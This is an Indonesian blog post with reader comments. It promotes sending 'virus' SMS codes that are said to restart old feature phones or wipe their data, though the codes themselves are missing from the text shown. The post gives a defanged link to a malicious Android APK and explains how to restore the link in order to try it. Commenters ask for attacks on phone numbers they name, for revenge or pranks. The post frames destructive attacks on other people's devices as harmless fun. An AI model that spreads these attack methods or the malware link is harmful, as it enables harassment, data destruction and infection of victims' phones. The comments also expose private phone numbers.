Cara membuat hp eror dengan sms / Kirim Virus via SMS

Posted by Cyberfrogteam on 12:35:00



Mau isengin temen lewat SMS yang buat HP mati sendiri atau membuat HP orang lain eror?
disini pertanyaan anda terjawab...! berikut kami sajikan beberapa kode untuk mematikan HP lewat SMS.

1. Kode pertama Bekerja pada hp yang gak ada cameranya, hp layar kecil, contoh : nokia 1209 , nokia 1208 ,nokia 1112  , nokia 1208 , serta seri yang sejenis atau HP monokrom dan efeknya bisa me restart hp tersebut



2. Kode Kedua Bekerja pada hp kamera seperti nokia 2700, nokia 6300, sony erisson G502, efeknya lebih ekstrem yakni dapat memFormat data yang ada di dalam hp tersebut seperti foto dan music atau data penting yang lain awalnya seperti seolah-olah restart sendiri padahal virusnya bekerja untuk menghapus data.




3. Kode Ketiga Bekerja pada Hanphone Jadul (Monokrome) & HP Cina dengan memory Internal Kecil, dan dapat dicoba ke HP apa saja untuk mengetahui kelemahan hp tersebut.




Untuk mengambil kode diatas silahkan gunakan gunakan Browser di HP anda lalu Copy Paste kode tersebut kedalam Format SMS lalu pilih target sesuai dengan keinginan anda.

Dan adapun Virus Untuk Andoroid

Jangan Sekali - kali membuka (Klik Link) Pesan yang berisi Link berikut :  

"Anda telah menerima pesan multimedia dari + [kode negara] [pengirim nomor]
Ikuti link http:[.]//www.momsforyouNet[.]/mms.apk
untuk melihat pesan Silahkan Klik,"
Hapus yang warna merah [.]  kalo anda mau mencoba (Jangan di Spasi)


Thanks dan kami tidak bertanggung jawab atas apa yang anda lakukan
Cheeeeeerrrsss


51 COMMENT:

  1. gan ane minta tolong nihh,,,kirimin virus dong ke no hp 089698566922 biar mati total,,orang ini meyebalkan uda menghina adik sy dan keluarga sy...tolong di bantu gan,,terima kasih sebelum nya..tolong rahasiakan nama dan account sy gan.

    ReplyDelete
  2. kita hanya share gan, kita gak mau dan gak bakal ikut campur masalah pribadi orang lain,,!
    biar dunia ini terasa indah kita apa adanya.....!
    maaf ya gan

    ReplyDelete
    Replies
    1. Gan kira2 yg kirim nox tebaca ga...

      Delete
  3. Gan kalo buat hp android bsa ga ??
    thx

    ReplyDelete
  4. gan, kalo hp yg sudah dikirim sms virus ini sudah error, trus cara mengembalikan hp seperti semula gimana ?

    ReplyDelete
  5. caranya Flash / buka kartu SIMnya dan aktifkan SIM di HP yang lebih canggih, maka SMSnya akan masuk ke HP baru ini, kemudian hapus sms virusnya

    ReplyDelete
  6. tolong matikan hp teman saya, karna hpnya dicuri,. matikan lwat sms ke no087736857354

    ReplyDelete
  7. gan kalo kode hp nokia asia apa ya ?

    ReplyDelete
  8. Kalo yg lebih extrim lgi ada ga gan?.. Kaya jnis deathnote.. Tpi yg bisa d krim lwat sms

    ReplyDelete
  9. cocok buat mematgikan hp cewek yang menjengkelkan dan hp cewe nakal, semoga bermnfaat

    ReplyDelete
  10. COPY KODENY baru PASTE di SMS lalu kirim

    ReplyDelete
  11. Gan yang kirim kira2 nox tbaca pa ga....

    ReplyDelete
  12. nomornya masih tetap dibaca apabila kartunya dirubah ke HP lain, karena masih belum ada provider yang menyediakan SMS tanpa nomor...! terima kasih

    ReplyDelete
  13. mantep gan tutuorialnya dlu sering di kerjain kaya gini nyebli bgt,,
    sekarang waktunya balas dendam.wakaka

    ReplyDelete
  14. Gan itu kita sasaranya ke hp cina apa kita yang pake hp cina buat transfer virursnya

    ReplyDelete
  15. Kita kirim dari Hp yang berformat GPRS / mendukung Java

    ReplyDelete
  16. Sekarang banyak yang pakai hp android dan bb, gimana cara ngirim virusnya gan?

    ReplyDelete
  17. mending pakai situs ini
    http://cyberfrogteam.blogspot.com/2011/04/virus-buat-iseng-iseng-ngerjain-temen.html
    Siapa tahu masih bekerja

    ReplyDelete
  18. gan tolong kirimkan virus ke pin ini gan
    penting banget soalnya hp gua ilang gan w
    plzzz ya gan
    secepatnya ( PIN : 22406F14 )

    THANKS :*

    ReplyDelete
  19. Gmana cranya gan , penting bgt nh, thaks

    ReplyDelete
  20. Neng Alifah kalo hp android tidak bisa kirim virus, cara diatas hanya bisa pada tipe hp yang sudah tertera diatas...!

    ReplyDelete
  21. kawakami
    kode virus buat android ada gk gan

    ReplyDelete
  22. Cara ngirim virusnya gimana gan?,di copy dan di paste kode virusnya lewat sms lalu dikirim ke nomor hp target yaaa?

    ReplyDelete
  23. iya bos, tapi hanya buat hp tertentu saja

    ReplyDelete
  24. Buat kirim lewat bbm bisa engga mind

    ReplyDelete
  25. bisa asalkan ada tombol combi (copy paste)

    ReplyDelete
  26. Sayang kode ke 2 dan 3 tidak bisa dikirim melalui sms tapih berubah ke mms

    ReplyDelete
  27. mas saya bisa minta tolong tidak ya... saya binngung ny ada orang yang bilang kalau saya selalu mengirim sms ke no hpnya dan membuat hpnya rusak trus dy bilang kalau sms itu berisi virus... lah saya kan bingung karena saya tidak merasa mengirim dan bisa membuat virus.... kira2 apa yang bisa saya lakukan ya mas

    ReplyDelete
  28. mungkin anda pernah masuk pada salah satu situs yang mana situs tersebut mendirect aplikasi mesage, saran saya, silahkan bersihkan riwayat browser anda! (gunanakan Clean Master, cari di google play)

    ReplyDelete
  29. hp java layar tocsrin bisa gk bos

    ReplyDelete
  30. @yoppy coba saja gan siapa tahu bisa :D

    ReplyDelete
  31. Gan kalo buat anroid ada gak ??

    ReplyDelete
  32. Tolong kirimin virus ke no ini gan. 0856 92529135

    ReplyDelete
  33. G mna gan apa kah sudah....

    ReplyDelete
  34. gan gw mw tnya,
    virus ini bisa dikirim dari hp samsung champ k samsung caramel ga.?

    ReplyDelete
  35. Yaa aku mau jahil tapi aku pakai asus

    ReplyDelete
  36. Gan,, tolong kirimkan virus k nmr ini gan. Hp nya hang,,, gag bsa nyala gan,,, kdang klw dah nyala gag mau d tekan tombolnya gan,,, tolong ya gan,,, 0895334212932. Jumlah nmr nya 13 gan

    ReplyDelete
  37. Gan,, tolong kirimkan virus k nmr ini gan. Hp nya hang,,, gag bsa nyala gan,,, kdang klw dah nyala gag mau d tekan tombolnya gan,,, tolong ya gan,,, 0895334212932. Jumlah nmr nya 13 gan

    ReplyDelete
  38. Kontol aplikasi jancik iki no HP ku 089665732135 nak iso juara kontolku mot

    ReplyDelete
  39. pake nomer baru aja biar aman

    ReplyDelete
  40. Kok saya ciba ga bs ya gan link nya

    ReplyDelete